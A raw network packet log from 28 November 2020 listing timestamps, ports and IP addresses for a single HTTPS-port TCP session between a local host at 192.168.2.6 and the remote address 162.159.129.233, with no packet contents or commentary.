Nov 28, 2020 10:24:54.886328936 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886353016 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886373043 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886390924 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.886394978 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886425018 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886429071 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.886446953 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886467934 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886477947 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.886491060 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886518955 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886548042 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886550903 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.886579990 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886580944 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.886604071 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886624098 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.886626005 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886647940 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886667013 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.886667967 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886688948 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886708975 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.886719942 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886745930 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886763096 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.886765003 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886786938 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886804104 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.886806965 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886827946 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886847019 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886850119 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.886867046 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886888981 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.886892080 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886914968 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886934042 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.886934996 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886955976 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886976957 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.886976957 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.886997938 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887011051 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887018919 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887041092 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887063980 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887065887 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887089014 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887109995 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887129068 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887131929 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887150049 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887159109 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887171030 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887192965 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887208939 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887212038 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887238979 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887239933 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887264013 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887284040 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887284994 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887307882 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887327909 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887330055 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887348890 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887367010 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887370110 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887392044 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887411118 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887415886 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887439966 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887456894 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887459993 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887480974 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887501001 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887502909 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887521029 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887533903 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887537956 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887557983 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887571096 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887582064 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887598991 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887614012 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887629986 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887645960 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887658119 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887666941 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887686968 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887706995 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887726068 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887744904 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887763977 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887782097 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887800932 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887808084 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887809038 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887811899 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887814045 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887830973 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887851954 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887855053 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887872934 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887893915 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887902975 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887914896 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887936115 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887943983 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887957096 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.887975931 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.887980938 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888004065 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888022900 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888025999 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888045073 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888062954 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888066053 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888087034 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888106108 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888125896 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888149977 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888171911 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888185978 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888191938 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888214111 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888236046 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888243914 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888257027 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888267994 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888278961 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888293982 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888298988 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888323069 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888324022 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888348103 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888367891 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888381004 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888389111 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888413906 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888433933 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888433933 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888454914 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888475895 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888492107 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888499975 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888509989 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888521910 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888539076 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888542891 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888564110 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888583899 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888592005 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888603926 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888624907 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888629913 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888645887 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888669968 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888684988 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888693094 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888712883 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888716936 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888734102 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888753891 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888755083 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888775110 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888794899 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888794899 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888816118 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888835907 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888839960 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888863087 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888884068 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888885021 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888906002 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888926029 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888931036 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888946056 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888964891 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888967037 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.888968945 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.888988018 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889009953 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889012098 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889034986 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889055014 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889065981 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889079094 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889101028 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889108896 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889121056 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889142036 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889149904 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889163017 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889189959 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889190912 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889214039 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889236927 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889238119 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889259100 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889280081 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889288902 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889301062 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889322042 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889326096 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889338017 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889343023 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889368057 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889379025 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889413118 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889414072 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889437914 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889456987 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889466047 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889472961 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889494896 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889514923 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889534950 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889548063 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889554977 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889554977 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889579058 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889597893 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889605999 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889622927 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889626026 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889641047 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889645100 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889666080 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889684916 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889698029 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889704943 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889723063 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889725924 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889748096 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889766932 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889780998 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889791965 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889810085 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889813900 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889834881 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889857054 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889877081 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889878988 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889895916 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889898062 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889919996 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889940977 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889950037 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.889966011 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889987946 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.889997005 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.890003920 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890023947 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890043974 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890068054 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890079975 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.890089989 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890110016 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890129089 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890131950 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.890149117 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890162945 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.890168905 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890188932 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890206099 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.890208006 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890233994 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890235901 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.890256882 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890276909 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890285969 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.890295982 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890316010 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890325069 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.890336037 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890357018 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890368938 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.890377045 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890399933 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.890412092 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.890463114 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.906686068 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.906718969 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.906740904 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.906761885 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.906776905 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.906851053 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.906852007 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.906887054 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.906913042 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.906935930 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.906944036 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.906958103 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.906977892 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907001019 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907020092 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907022953 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907047987 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907052040 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907061100 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907078028 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907099962 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907121897 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907125950 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907145977 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907167912 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907175064 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907190084 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907211065 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907211065 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907242060 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907253981 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907279015 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907308102 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907321930 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907331944 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907352924 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907373905 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907376051 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907398939 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907417059 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907419920 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907447100 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907459021 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907473087 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907495975 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907516956 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907537937 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907538891 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907557964 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907557964 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907592058 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907596111 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907624960 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907656908 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907666922 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907682896 CET	443	49728	162.159.129.233	192.168.2.6
